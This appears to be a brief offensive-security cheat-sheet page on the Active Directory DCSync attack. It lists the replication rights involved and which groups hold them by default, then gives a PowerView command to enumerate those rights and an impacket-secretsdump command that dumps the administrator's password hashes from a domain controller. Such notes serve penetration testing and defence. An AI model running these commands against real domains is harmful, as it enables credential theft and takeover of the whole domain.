DCSync

Information

Includes the following rights:

GetChanges → internal/technical permission name used in APIs and LDAP.
Replication-Directory-Changes → friendly display name for the same permission.

Replication-Get-Changes / GetChanges
Replication-Directory-Changes-All / GetChangesAll
Replication-Directory-Changes-In-Filtered-Set / GetChangesInFilteredSet (not always)

Default setting: Domain Admins, Enterprise Admins, Administrators, and Domain Controllers.

Exploitation

Enumerate rights:

Get-ObjectAcl -DistinguishedName "dc=x7331,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}

Dump NTDS:

impacket-secretsdump x7331.local/user:pass@<dc-ip> -just-dc-user administrator

PreviousAddSelf NextForceChangePassword

Last updated 17 days ago

Was this helpful?